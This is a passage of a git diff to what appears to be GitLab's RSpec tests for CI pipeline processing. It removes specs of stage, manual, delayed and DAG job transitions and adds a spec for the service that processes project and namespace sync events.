expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test deploy production) - expect(builds_statuses).to eq %w(success success pending manual) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test deploy production cleanup clear:cache) - expect(builds_statuses).to eq %w(success success success manual pending manual) - - succeed_running_or_pending - - expect(builds_statuses).to eq %w(success success success manual success manual) - expect(pipeline.reload.status).to eq 'success' - end - end - - context 'when test job fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test test_failure) - expect(builds_statuses).to eq %w(success failed pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test test_failure cleanup) - expect(builds_statuses).to eq %w(success failed success pending) - - succeed_running_or_pending - - expect(builds_statuses).to eq %w(success failed success success) - expect(pipeline.reload.status).to eq 'failed' - end - end - - context 'when test and test_failure jobs fail' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test test_failure) - expect(builds_statuses).to eq %w(success failed pending) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test test_failure cleanup) - expect(builds_statuses).to eq %w(success failed failed pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test test_failure cleanup) - expect(builds_statuses).to eq %w(success failed failed success) - expect(pipeline.reload.status).to eq('failed') - end - end - - context 'when deploy job fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test deploy production) - expect(builds_statuses).to eq %w(success success pending manual) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test deploy production cleanup) - expect(builds_statuses).to eq %w(success success failed manual pending) - - succeed_running_or_pending - - expect(builds_statuses).to eq %w(success success failed manual success) - expect(pipeline.reload).to be_failed - end - end - - context 'when build is canceled in the second stage' do - it 'does not schedule builds after build has been canceled' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds.running_or_pending).not_to be_empty - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - cancel_running_or_pending - - expect(builds.running_or_pending).to be_empty - expect(builds_names).to eq %w[build test] - expect(builds_statuses).to eq %w[success canceled] - expect(pipeline.reload).to be_canceled - end - end - - context 'when listing optional manual actions' do - it 'returns only for skipped builds' do - # currently all builds are created - expect(process_pipeline).to be_truthy - expect(manual_actions).to be_empty - - # succeed stage build - succeed_running_or_pending - - expect(manual_actions).to be_empty - - # succeed stage test - succeed_running_or_pending - - expect(manual_actions).to be_one # production - - # succeed stage deploy - succeed_running_or_pending - - expect(manual_actions).to be_many # production and clear cache - end - end - end - - context 'when delayed jobs are defined', :sidekiq_inline do - context 'when the scene is timed incremental rollout' do - before do - create_build('build', stage_idx: 0) - create_build('rollout10%', **delayed_options, stage_idx: 1) - create_build('rollout100%', **delayed_options, stage_idx: 2) - create_build('cleanup', stage_idx: 3) - - allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - context 'when builds are successful' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('rollout10%') - end - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('rollout100%') - end - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'success' }) - expect(pipeline.reload.status).to eq 'success' - end - end - - context 'when build job fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - fail_running_or_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'failed' }) - expect(pipeline.reload.status).to eq 'failed' - end - end - - context 'when rollout 10% is unscheduled' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) - - unschedule - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'manual' }) - expect(pipeline.reload.status).to eq 'manual' - end - - context 'when user plays rollout 10%' do - it 'schedules rollout100%' do - process_pipeline - succeed_pending - unschedule - play_manual_action('rollout10%') - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) - expect(pipeline.reload.status).to eq 'scheduled' - end - end - end - - context 'when rollout 10% fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('rollout10%') - end - fail_running_or_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'failed' }) - expect(pipeline.reload.status).to eq 'failed' - end - - context 'when user retries rollout 10%' do - it 'does not schedule rollout10% again' do - process_pipeline - succeed_pending - enqueue_scheduled('rollout10%') - fail_running_or_pending - retry_build('rollout10%') - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) - expect(pipeline.reload.status).to eq 'running' - end - end - end - - context 'when rollout 10% is played immidiately' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) - - play_manual_action('rollout10%') - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) - expect(pipeline.reload.status).to eq 'running' - end - end - end - - context 'when only one scheduled job exists in a pipeline' do - before do - create_build('delayed', **delayed_options, stage_idx: 0) - - allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) - - expect(pipeline.reload.status).to eq 'scheduled' - end - end - - context 'when there are two delayed jobs in a stage' do - before do - create_build('delayed1', **delayed_options, stage_idx: 0) - create_build('delayed2', **delayed_options, stage_idx: 0) - create_build('job', stage_idx: 1) - - allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - it 'blocks the stage until all scheduled jobs finished' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'delayed1': 'scheduled', 'delayed2': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('delayed1') - end - - expect(builds_names_and_statuses).to eq({ 'delayed1': 'pending', 'delayed2': 'scheduled' }) - expect(pipeline.reload.status).to eq 'running' - end - end - - context 'when a delayed job is allowed to fail' do - before do - create_build('delayed', **delayed_options, allow_failure: true, stage_idx: 0) - create_build('job', stage_idx: 1) - - allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - it 'blocks the stage and continues after it failed' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('delayed') - end - fail_running_or_pending - - expect(builds_names_and_statuses).to eq({ 'delayed': 'failed', 'job': 'pending' }) - expect(pipeline.reload.status).to eq 'pending' - end - end - end - - context 'when an exception is raised during a persistent ref creation' do - before do - successful_build('test', stage_idx: 0) - - allow_next_instance_of(Ci::PersistentRef) do |instance| - allow(instance).to receive(:delete_refs) { raise ArgumentError } - end - end - - it 'process the pipeline' do - expect { process_pipeline }.not_to raise_error - end - end - - context 'when there are manual action in earlier stages' do - context 'when first stage has only optional manual actions' do - before do - create_build('build', stage_idx: 0, when: 'manual', allow_failure: true) - create_build('check', stage_idx: 1) - create_build('test', stage_idx: 2) - - process_pipeline - end - - it 'starts from the second stage' do - expect(all_builds_statuses).to eq %w[manual pending created] - end - end - - context 'when second stage has only optional manual actions' do - before do - create_build('check', stage_idx: 0) - create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) - create_build('test', stage_idx: 2) - - process_pipeline - end - - it 'skips second stage and continues on third stage', :sidekiq_inline do - expect(all_builds_statuses).to eq(%w[pending created created]) - - builds.first.success - - expect(all_builds_statuses).to eq(%w[success manual pending]) - end - end - end - - context 'when there are only manual actions in stages' do - before do - create_build('image', stage_idx: 0, when: 'manual', allow_failure: true) - create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) - create_build('deploy', stage_idx: 2, when: 'manual') - create_build('check', stage_idx: 3) - - process_pipeline - end - - it 'processes all jobs until blocking actions encountered' do - expect(all_builds_statuses).to eq(%w[manual manual manual created]) - expect(all_builds_names).to eq(%w[image build deploy check]) - - expect(pipeline.reload).to be_blocked - end - end - - context 'when there is only one manual action' do - before do - create_build('deploy', stage_idx: 0, when: 'manual', allow_failure: true) - - process_pipeline - end - - it 'skips the pipeline' do - expect(pipeline.reload).to be_skipped - end - - context 'when the action was played' do - before do - play_manual_action('deploy') - end - - it 'queues the action and pipeline', :sidekiq_inline do - expect(all_builds_statuses).to eq(%w[pending]) - - expect(pipeline.reload).to be_pending - end - end - end - - context 'when blocking manual actions are defined', :sidekiq_inline do - before do - create_build('code:test', stage_idx: 0) - create_build('staging:deploy', stage_idx: 1, when: 'manual') - create_build('staging:test', stage_idx: 2, when: 'on_success') - create_build('production:deploy', stage_idx: 3, when: 'manual') - create_build('production:test', stage_idx: 4, when: 'always') - end - - context 'when first stage succeeds' do - it 'blocks pipeline on stage with first manual action' do - process_pipeline - - expect(builds_names).to eq %w[code:test] - expect(builds_statuses).to eq %w[pending] - expect(pipeline.reload.status).to eq 'pending' - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy] - expect(builds_statuses).to eq %w[success manual] - expect(pipeline.reload).to be_manual - end - end - - context 'when first stage fails' do - it 'does not take blocking action into account' do - process_pipeline - - expect(builds_names).to eq %w[code:test] - expect(builds_statuses).to eq %w[pending] - expect(pipeline.reload.status).to eq 'pending' - - fail_running_or_pending - - expect(builds_names).to eq %w[code:test production:test] - expect(builds_statuses).to eq %w[failed pending] - - succeed_running_or_pending - - expect(builds_statuses).to eq %w[failed success] - expect(pipeline.reload).to be_failed - end - end - - context 'when pipeline is promoted sequentially up to the end' do - before do - # Users need ability to merge into a branch in order to trigger - # protected manual actions. - # - create(:protected_branch, :developers_can_merge, - name: 'master', project: project) - end - - it 'properly processes entire pipeline' do - process_pipeline - - expect(builds_names).to eq %w[code:test] - expect(builds_statuses).to eq %w[pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy] - expect(builds_statuses).to eq %w[success manual] - expect(pipeline.reload).to be_manual - - play_manual_action('staging:deploy') - - expect(builds_statuses).to eq %w[success pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test] - expect(builds_statuses).to eq %w[success success pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test - production:deploy] - expect(builds_statuses).to eq %w[success success success manual] - - expect(pipeline.reload).to be_manual - expect(pipeline.reload).to be_blocked - expect(pipeline.reload).not_to be_active - expect(pipeline.reload).not_to be_complete - - play_manual_action('production:deploy') - - expect(builds_statuses).to eq %w[success success success pending] - expect(pipeline.reload).to be_running - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test - production:deploy production:test] - expect(builds_statuses).to eq %w[success success success success pending] - expect(pipeline.reload).to be_running - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test - production:deploy production:test] - expect(builds_statuses).to eq %w[success success success success success] - expect(pipeline.reload).to be_success - end - end - end - - context 'when second stage has only on_failure jobs', :sidekiq_inline do - before do - create_build('check', stage_idx: 0) - create_build('build', stage_idx: 1, when: 'on_failure') - create_build('test', stage_idx: 2) - - process_pipeline - end - - it 'skips second stage and continues on third stage' do - expect(all_builds_statuses).to eq(%w[pending created created]) - - builds.first.success - - expect(all_builds_statuses).to eq(%w[success skipped pending]) - end - end - - context 'when failed build in the middle stage is retried', :sidekiq_inline do - context 'when failed build is the only unsuccessful build in the stage' do - before do - create_build('build:1', stage_idx: 0) - create_build('build:2', stage_idx: 0) - create_build('test:1', stage_idx: 1) - create_build('test:2', stage_idx: 1) - create_build('deploy:1', stage_idx: 2) - create_build('deploy:2', stage_idx: 2) - end - - it 'does trigger builds in the next stage' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build:1', 'build:2'] - - succeed_running_or_pending - - expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] - - pipeline.builds.find_by(name: 'test:1').success! - pipeline.builds.find_by(name: 'test:2').drop! - - expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] - - Ci::Build.retry(pipeline.builds.find_by(name: 'test:2'), user).reset.success! - - expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2', - 'test:2', 'deploy:1', 'deploy:2'] - end - end - end - - context 'when builds with auto-retries are configured', :sidekiq_inline do - before do - create_build('build:1', stage_idx: 0, user: user, options: { script: 'aa', retry: 2 }) - create_build('test:1', stage_idx: 1, user: user, when: :on_failure) - create_build('test:2', stage_idx: 1, user: user, options: { script: 'aa', retry: 1 }) - end - - it 'automatically retries builds in a valid order' do - expect(process_pipeline).to be_truthy - - fail_running_or_pending - - expect(builds_names).to eq %w[build:1 build:1] - expect(builds_statuses).to eq %w[failed pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[build:1 build:1 test:2] - expect(builds_statuses).to eq %w[failed success pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[build:1 build:1 test:2] - expect(builds_statuses).to eq %w[failed success success] - - expect(pipeline.reload).to be_success - end - end - - context 'when pipeline with needs is created', :sidekiq_inline do - let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } - let!(:mac_build) { create_build('mac:build', stage: 'build', stage_idx: 0) } - let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:linux_rubocop) { create_build('linux:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:mac_rspec) { create_build('mac:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:mac_rubocop) { create_build('mac:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2) } - - let!(:linux_rspec_on_build) { create(:ci_build_need, build: linux_rspec, name: 'linux:build') } - let!(:linux_rubocop_on_build) { create(:ci_build_need, build: linux_rubocop, name: 'linux:build') } - - let!(:mac_rspec_on_build) { create(:ci_build_need, build: mac_rspec, name: 'mac:build') } - let!(:mac_rubocop_on_build) { create(:ci_build_need, build: mac_rubocop, name: 'mac:build') } - - it 'when linux:* finishes first it runs it out of order' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(pending created created)) - expect(builds.pending).to contain_exactly(linux_build, mac_build) - - # we follow the single path of linux - linux_build.reset.success! - - expect(stages).to eq(%w(running pending created)) - expect(builds.success).to contain_exactly(linux_build) - expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) - - linux_rspec.reset.success! - - expect(stages).to eq(%w(running running created)) - expect(builds.success).to contain_exactly(linux_build, linux_rspec) - expect(builds.pending).to contain_exactly(mac_build, linux_rubocop) - - linux_rubocop.reset.success! - - expect(stages).to eq(%w(running running created)) - expect(builds.success).to contain_exactly(linux_build, linux_rspec, linux_rubocop) - expect(builds.pending).to contain_exactly(mac_build) - - mac_build.reset.success! - mac_rspec.reset.success! - mac_rubocop.reset.success! - - expect(stages).to eq(%w(success success pending)) - expect(builds.success).to contain_exactly( - linux_build, linux_rspec, linux_rubocop, mac_build, mac_rspec, mac_rubocop) - expect(builds.pending).to contain_exactly(deploy) - end - - context 'when one of the jobs is run on a failure' do - let!(:linux_notify) { create_build('linux:notify', stage: 'deploy', stage_idx: 2, when: 'on_failure', scheduling_type: :dag) } - - let!(:linux_notify_on_build) { create(:ci_build_need, build: linux_notify, name: 'linux:build') } - - context 'when another job in build phase fails first' do - it 'does skip linux:notify' do - expect(process_pipeline).to be_truthy - - mac_build.reset.drop! - linux_build.reset.success! - - expect(linux_notify.reset).to be_skipped - end - end - - context 'when linux:build job fails first' do - it 'does run linux:notify' do - expect(process_pipeline).to be_truthy - - linux_build.reset.drop! - - expect(linux_notify.reset).to be_pending - end - end - end - - context 'when there is a job scheduled with dag but no need (needs: [])' do - let!(:deploy_pages) { create_build('deploy_pages', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } - - it 'runs deploy_pages without waiting prior stages' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(pending created pending)) - expect(builds.pending).to contain_exactly(linux_build, mac_build, deploy_pages) - - linux_build.reset.success! - deploy_pages.reset.success! - - expect(stages).to eq(%w(running pending running)) - expect(builds.success).to contain_exactly(linux_build, deploy_pages) - expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) - - linux_rspec.reset.success! - linux_rubocop.reset.success! - mac_build.reset.success! - mac_rspec.reset.success! - mac_rubocop.reset.success! - - expect(stages).to eq(%w(success success running)) - expect(builds.pending).to contain_exactly(deploy) - end - end - end - - context 'when a needed job is skipped', :sidekiq_inline do - let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } - let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1) } - let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } - - before do - create(:ci_build_need, build: deploy, name: 'linux:build') - end - - it 'skips the jobs depending on it' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(pending created created)) - expect(all_builds.pending).to contain_exactly(linux_build) - - linux_build.reset.drop! - - expect(stages).to eq(%w(failed skipped skipped)) - expect(all_builds.failed).to contain_exactly(linux_build) - expect(all_builds.skipped).to contain_exactly(linux_rspec, deploy) - end - end - - context 'when a needed job is manual', :sidekiq_inline do - let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0, when: 'manual', allow_failure: true) } - let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 1, scheduling_type: :dag) } - - before do - create(:ci_build_need, build: deploy, name: 'linux:build') - end - - it 'makes deploy DAG to be skipped' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(skipped skipped)) - expect(all_builds.manual).to contain_exactly(linux_build) - expect(all_builds.skipped).to contain_exactly(deploy) - end - end - - context 'when a bridge job has parallel:matrix config', :sidekiq_inline do - let(:parent_config) do - <<-EOY - test: - stage: test - script: echo test - - deploy: - stage: deploy - trigger: - include: .child.yml - parallel: - matrix: - - PROVIDER: ovh - STACK: [monitoring, app] - EOY - end - - let(:child_config) do - <<-EOY - test: - stage: test - script: echo test - EOY - end - - let(:pipeline) do - Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload - end - - before do - allow_next_instance_of(Repository) do |repository| - allow(repository) - .to receive(:blob_data_at) - .with(an_instance_of(String), '.gitlab-ci.yml') - .and_return(parent_config) - - allow(repository) - .to receive(:blob_data_at) - .with(an_instance_of(String), '.child.yml') - .and_return(child_config) - end - end - - it 'creates pipeline with bridges, then passes the matrix variables to downstream jobs' do - expect(all_builds_names).to contain_exactly('test', 'deploy: [ovh, monitoring]', 'deploy: [ovh, app]') - expect(all_builds_statuses).to contain_exactly('pending', 'created', 'created') - - succeed_pending - - # bridge jobs directly transition to success - expect(all_builds_statuses).to contain_exactly('success', 'success', 'success') - - bridge1 = all_builds.find_by(name: 'deploy: [ovh, monitoring]') - bridge2 = all_builds.find_by(name: 'deploy: [ovh, app]') - - downstream_job1 = bridge1.downstream_pipeline.processables.first - downstream_job2 = bridge2.downstream_pipeline.processables.first - - expect(downstream_job1.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'monitoring') - expect(downstream_job2.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'app') - end - end - - context 'when a bridge job has invalid downstream project', :sidekiq_inline do - let(:config) do - <<-EOY - test: - stage: test - script: echo test - - deploy: - stage: deploy - trigger: - project: invalid-project - EOY - end - - let(:pipeline) do - Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload - end - - before do - stub_ci_pipeline_yaml_file(config) - end - - it 'creates a pipeline, then fails the bridge job' do - expect(all_builds_names).to contain_exactly('test', 'deploy') - expect(all_builds_statuses).to contain_exactly('pending', 'created') - - succeed_pending - - expect(all_builds_names).to contain_exactly('test', 'deploy') - expect(all_builds_statuses).to contain_exactly('success', 'failed') - end - end - - private - - def all_builds - pipeline.processables.order(:stage_idx, :id) - end - - def builds - all_builds.where.not(status: [:created, :skipped]) - end - - def stages - pipeline.reset.stages.map(&:status) - end - - def builds_names - builds.pluck(:name) - end - - def builds_names_and_statuses - builds.each_with_object({}) do |b, h| - h[b.name.to_sym] = b.status - h - end - end - - def all_builds_names - all_builds.pluck(:name) - end - - def builds_statuses - builds.pluck(:status) - end - - def all_builds_statuses - all_builds.pluck(:status) - end - - def succeed_pending - builds.pending.each do |build| - build.reset.success - end - end - - def succeed_running_or_pending - pipeline.builds.running_or_pending.each do |build| - build.reset.success - end - end - - def fail_running_or_pending - pipeline.builds.running_or_pending.each do |build| - build.reset.drop - end - end - - def cancel_running_or_pending - pipeline.builds.running_or_pending.each do |build| - build.reset.cancel - end - end - - def play_manual_action(name) - builds.find_by(name: name).play(user) - end - - def enqueue_scheduled(name) - builds.scheduled.find_by(name: name).enqueue_scheduled - end - - def retry_build(name) - Ci::Build.retry(builds.find_by(name: name), user) - end - - def manual_actions - pipeline.manual_actions.reload - end - - def create_build(name, **opts) - create(:ci_build, :created, pipeline: pipeline, name: name, **with_stage_opts(opts)) - end - - def successful_build(name, **opts) - create(:ci_build, :success, pipeline: pipeline, name: name, **with_stage_opts(opts)) - end - - def with_stage_opts(opts) - { stage: "stage-#{opts[:stage_idx].to_i}" }.merge(opts) - end - - def delayed_options - { when: 'delayed', options: { script: %w(echo), start_in: '1 minute' } } - end - - def unschedule - pipeline.builds.scheduled.map(&:unschedule) - end -end diff --git a/spec/services/ci/pipeline_processing/shared_processing_service_tests_with_yaml.rb b/spec/services/ci/pipeline_processing/shared_processing_service_tests_with_yaml.rb deleted file mode 100644 index b4ad2512593..00000000000 --- a/spec/services/ci/pipeline_processing/shared_processing_service_tests_with_yaml.rb +++ /dev/null @@ -1,61 +0,0 @@ -# frozen_string_literal: true - -RSpec.shared_context 'Pipeline Processing Service Tests With Yaml' do - let_it_be(:project) { create(:project, :repository) } - let_it_be(:user) { project.owner } - - where(:test_file_path) do - Dir.glob(Rails.root.join('spec/services/ci/pipeline_processing/test_cases/*.yml')) - end - - with_them do - let(:test_file) { YAML.load_file(test_file_path) } - let(:pipeline) { Ci::CreatePipelineService.new(project, user, ref: 'master').execute(:pipeline).payload } - - before do - stub_ci_pipeline_yaml_file(YAML.dump(test_file['config'])) - end - - it 'follows transitions' do - expect(pipeline).to be_persisted - Sidekiq::Worker.drain_all # ensure that all async jobs are executed - check_expectation(test_file.dig('init', 'expect'), "init") - - test_file['transitions'].each_with_index do |transition, idx| - event_on_jobs(transition['event'], transition['jobs']) - Sidekiq::Worker.drain_all # ensure that all async jobs are executed - check_expectation(transition['expect'], "transition:#{idx}") - end - end - - private - - def check_expectation(expectation, message) - expect(current_state.deep_stringify_keys).to eq(expectation), message - end - - def current_state - # reload pipeline and all relations - pipeline.reload - - { - pipeline: pipeline.status, - stages: pipeline.stages.pluck(:name, :status).to_h, - jobs: pipeline.latest_statuses.pluck(:name, :status).to_h - } - end - - def event_on_jobs(event, job_names) - statuses = pipeline.latest_statuses.by_name(job_names).to_a - expect(statuses.count).to eq(job_names.count) # ensure that we have the same counts - - statuses.each do |status| - if event == 'play' - status.play(user) - else - status.public_send("#{event}!") - end - end - end - end -end diff --git a/spec/services/ci/play_build_service_spec.rb b/spec/services/ci/play_build_service_spec.rb index babd601e0cf..34f77260334 100644 --- a/spec/services/ci/play_build_service_spec.rb +++ b/spec/services/ci/play_build_service_spec.rb @@ -79,12 +79,22 @@ RSpec.describe Ci::PlayBuildService, '#execute' do { key: 'second', secret_value: 'second' }] end + subject { service.execute(build, job_variables) } + it 'assigns the variables to the build' do - service.execute(build, job_variables) + subject expect(build.reload.job_variables.map(&:key)).to contain_exactly('first', 'second') end + context 'when variables are invalid' do + let(:job_variables) { [{}] } + + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::RecordInvalid) + end + end + context 'when user defined variables are restricted' do before do project.update!(restrict_user_defined_variables: true) @@ -96,7 +106,7 @@ RSpec.describe Ci::PlayBuildService, '#execute' do end it 'assigns the variables to the build' do - service.execute(build, job_variables) + subject expect(build.reload.job_variables.map(&:key)).to contain_exactly('first', 'second') end @@ -104,8 +114,7 @@ RSpec.describe Ci::PlayBuildService, '#execute' do context 'when user is developer' do it 'raises an error' do - expect { service.execute(build, job_variables) } - .to raise_error Gitlab::Access::AccessDeniedError + expect { subject }.to raise_error Gitlab::Access::AccessDeniedError end end end diff --git a/spec/services/ci/process_sync_events_service_spec.rb b/spec/services/ci/process_sync_events_service_spec.rb new file mode 100644 index 00000000000..00b670ff54f --- /dev/null +++ b/spec/services/ci/process_sync_events_service_spec.rb @@ -0,0 +1,129 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::ProcessSyncEventsService do + let!(:group) { create(:group) } + let!(:project1) { create(:project, group: group) } + let!(:project2) { create(:project, group: group) } + let!(:parent_group_1) { create(:group) } + let!(:parent_group_2) { create(:group) } + + subject(:service) { described_class.new(sync_event_class, hierarchy_class) } + + describe '#perform' do + subject(:execute) { service.execute } + + context 'for Projects::SyncEvent' do + let(:sync_event_class) { Projects::SyncEvent } + let(:hierarchy_class) { ::Ci::ProjectMirror } + + before do + Projects::SyncEvent.delete_all + + project1.update!(group: parent_group_1) + project2.update!(group: parent_group_2) + end + + it 'consumes events' do + expect { execute }.to change(Projects::SyncEvent, :count).from(2).to(0) + + expect(project1.ci_project_mirror).to have_attributes( + namespace_id: parent_group_1.id + ) + expect(project2.ci_project_mirror).to have_attributes( + namespace_id: parent_group_2.id + ) + end + + it 'enqueues Projects::ProcessSyncEventsWorker if any left' do + stub_const("#{described_class}::BATCH_SIZE", 1) + + expect(Projects::ProcessSyncEventsWorker).to receive(:perform_async) + + execute + end + + it 'does not enqueue Projects::ProcessSyncEventsWorker if no left' do + stub_const("#{described_class}::BATCH_SIZE", 2) + + expect(Projects::ProcessSyncEventsWorker).not_to receive(:perform_async) + + execute + end + + context 'when there is no event' do + before do + Projects::SyncEvent.delete_all + end + + it 'does nothing' do + expect { execute }.not_to change(Projects::SyncEvent, :count) + end + end + + context 'when the FF ci_namespace_project_mirrors is disabled' do + before do + stub_feature_flags(ci_namespace_project_mirrors: false) + end + + it 'does nothing' do + expect { execute }.not_to change(Projects::SyncEvent, :count) + end + end + end + + context 'for Namespaces::SyncEvent' do + let(:sync_event_class) { Namespaces::SyncEvent } + let(:hierarchy_class) { ::Ci::NamespaceMirror } + + before do + Namespaces::SyncEvent.delete_all + + group.update!(parent: parent_group_2) + parent_group_2.update!(parent: parent_group_1) + end + + shared_examples 'event consuming' do + it 'consumes events' do + expect { execute }.to change(Namespaces::SyncEvent, :count).from(2).to(0) + + expect(group.ci_namespace_mirror).to have_attributes( + traversal_ids: [parent_group_1.id, parent_group_2.id, group.id] + ) + expect(parent_group_2.ci_namespace_mirror).to have_attributes( + traversal_ids: [parent_group_1.id, parent_group_2.id] + ) + end + end + + context 'when the FFs sync_traversal_ids, use_traversal_ids and use_traversal_ids_for_ancestors are disabled' do + before do + stub_feature_flags(sync_traversal_ids: false, + use_traversal_ids: false, + use_traversal_ids_for_ancestors: false) + end + + it_behaves_like 'event consuming' + end + + it_behaves_like 'event consuming' + + it 'enqueues Namespaces::ProcessSyncEventsWorker if any left' do + stub_const("#{described_class}::BATCH_SIZE", 1) + + expect(Namespaces::ProcessSyncEventsWorker).to receive(:perform_async) + + execute + end + + it 'does not enqueue Namespaces::ProcessSyncEventsWorker if no left' do + stub_const("#{described_class}::BATCH_SIZE", 2) + + expect(Namespaces::ProcessSyncEventsWorker).not_to receive(:perform_async) + + execute + end + end + end +end diff --git a/spec/services/ci/register_job_service_spec.rb b/spec/services/ci/register_job_service_spec.rb index 650353eb751..866015aa523 100644 --- a/spec/services/ci/register_job_service_spec.rb +++ b/spec/services/ci/register_job_service_spec.rb @@ -87,36 +87,10 @@ module Ci end context 'for specific runner' do - context 'with 